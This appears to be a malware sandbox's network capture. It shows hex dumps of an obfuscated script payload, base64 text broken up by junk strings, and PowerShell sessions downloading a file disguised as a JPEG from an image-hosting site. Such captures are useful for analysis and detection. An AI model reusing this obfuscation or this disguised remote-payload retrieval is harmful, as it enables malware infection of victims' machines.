      2024-05-27 13:21:02 UTC1369INData Raw: 44 63 44 67 54 72 65 4e 67 44 67 54 72 65 7a 44 67 54 72 65 44 51 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72
      Data Ascii: DcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & jurupema & fenedina & jurupema & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTr
      2024-05-27 13:21:02 UTC1369INData Raw: 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 52 67 42 73 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 44 77 44 67 54 72 65 50 44 67 54 72 65 42 43 44 67 54 72 65 45 45 44 67 54 72 65 55 77 42 46 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42
      Data Ascii: QDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & jurupema & fenedina & jurupema & "QBuDgTreGQDgTreRgBsDgTreGEDgTre" & jurupema & fenedina & jurupema & "wDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreB
      2024-05-27 13:21:02 UTC1369INData Raw: 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72
      Data Ascii: jurupema & fenedina & jurupema & "DgTreDgTregDgTreCQDgTre" & jurupema & fenedina & jurupema & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" & jurupema & fenedina & jurupema & "QB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTr
      2024-05-27 13:21:02 UTC1369INData Raw: 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 51 42 34 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 45 77 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 51 42 75 44 67 54 72 65 47 63 44 67 54 72 65 64 44 67 54 72 65 42 6f 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 59 77 42 76 44 67 54 72 65 47 30 44 67 54 72
      Data Ascii: reYQByDgTreHQDgTreSQBuDgTreGQDgTre" & jurupema & fenedina & jurupema & "QB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTre" & jurupema & fenedina & jurupema & "QBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTr
      2024-05-27 13:21:02 UTC1369INData Raw: 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 42 55 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72 65 42 6c 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 51 44 67 54 72 65 46 49 44 67 54 72 65 54 77 42 4b 44 67 54 72 65 45 55 44 67 54 72 65 56 44 67 54 72 65 42 50 44 67 54 72 65 45 45 44 67 54 72 65 56 51 42 55 44 67 54 72 65 45 38 44 67 54 72 65 54 51 42 42
      Data Ascii: reJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & jurupema & fenedina & jurupema & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBB
      2024-05-27 13:21:02 UTC1369INData Raw: 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 22 51 44 67 54 72 65 34 44 67 54 72 65 44 6b 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 44 51 44 67 54 72 65 4d 51 44 67 54 72 65 35 44 67 54 72 65 47 49 44 67 54 72 65 4e 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 47 30 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 6d 44 67 54 72 65 47 45 44 67 54 72 65 4e 67 44 67 54 72 65 79 44 67 54 72 65 47 51 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 31 44 67 54 72 65 44 59 44 67 54 72 65 4e 67 44 67 54 72 65 39 44 67 54 72 65 48 4d 44 67 54 72 65 61 51 44 67 54 72 65 6d 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 6a 75 72 75 70 65 6d 61 20 26 20 66 65 6e 65 64 69 6e 61 20 26 20 6a 75 72
      Data Ascii: jurupema & fenedina & jurupema & "QDgTre4DgTreDkDgTreNgDgTre0DgTreDQDgTreMQDgTre5DgTreGIDgTreNDgTreDgTre9DgTreG0DgTreaDgTreDgTremDgTreGEDgTreNgDgTreyDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGEDgTre" & jurupema & fenedina & jur


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.449731188.114.97.34437476C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      2024-05-27 13:21:05 UTC124OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
      Host: uploaddeimagens.com.br
      Connection: Keep-Alive
      2024-05-27 13:21:05 UTC705INHTTP/1.1 200 OK
      Date: Mon, 27 May 2024 13:21:05 GMT
      Content-Type: image/jpeg
      Content-Length: 4201093
      Connection: close
      Last-Modified: Tue, 21 May 2024 16:07:14 GMT
      ETag: "664cc6b2-401a85"
      Cache-Control: max-age=2678400
      CF-Cache-Status: HIT
      Age: 3272
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cIy2C6CNE%2B%2FrTLRhD5K0AQjkjFo30Cfa4B9DI4%2BXUkXJ8qUbBLI%2BjAMjzLDl0TXBd3FFZL%2FYhKkpfmhV42XEOcpC1rm%2BZFgYgpheSJUzAP%2FmoZbRVtd0k3y6shEZAOS72TYwjDSe%2FBbL"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88a64e59485342cb-EWR
      alt-svc: h3=":443"; ma=86400
      2024-05-27 13:21:05 UTC664INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
      2024-05-27 13:21:05 UTC1369INData Raw: d8 50 e1 af 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92
      Data Ascii: Po.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
      2024-05-27 13:21:05 UTC1369INData Raw: 17 ce 19 e7 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67
      Data Ascii: HVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
      2024-05-27 13:21:05 UTC1369INData Raw: b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3
      Data Ascii: /-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`
      2024-05-27 13:21:05 UTC1369INData Raw: b1 8c d1 d5 d7 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7
      Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@
      2024-05-27 13:21:05 UTC1369INData Raw: 60 7b df c3 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69
      Data Ascii: `{:4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>i
      2024-05-27 13:21:05 UTC1369INData Raw: 7b e6 9b f8 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d
      Data Ascii: {Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
      2024-05-27 13:21:05 UTC1369INData Raw: 34 84 31 03 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b
      Data Ascii: 411Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8
      2024-05-27 13:21:05 UTC1369INData Raw: 60 f2 1b 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d
      Data Ascii: `lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*
      2024-05-27 13:21:05 UTC1369INData Raw: 20 46 55 5a b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb
      Data Ascii: FUZ@t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A h


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.449732188.114.97.34437476C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      2024-05-27 13:21:09 UTC100OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
      Host: uploaddeimagens.com.br
      2024-05-27 13:21:09 UTC703INHTTP/1.1 200 OK
      Date: Mon, 27 May 2024 13:21:09 GMT
      Content-Type: image/jpeg
      Content-Length: 4201093
      Connection: close
      Last-Modified: Tue, 21 May 2024 16:07:14 GMT
      ETag: "664cc6b2-401a85"
      Cache-Control: max-age=2678400
      CF-Cache-Status: HIT
      Age: 3276
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yKJAwCy%2FjBsvQ9oNho%2BxQnpA7EQaJ63nU1Ho9GaBiopbP9qCTV3iaGVC2c%2F3I88gRbUmZNmb7eaq7nWH4fdvheFLUf%2BE%2FSZFYgA9E%2BoKwhwKXdiAiuPpBziLZBdU%2Bonmj2GClPvOYjjS"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88a64e734b1743d6-EWR
      alt-svc: h3=":443"; ma=86400
      2024-05-27 13:21:09 UTC666INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
      2024-05-27 13:21:09 UTC1369INData Raw: e1 af 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b
      Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
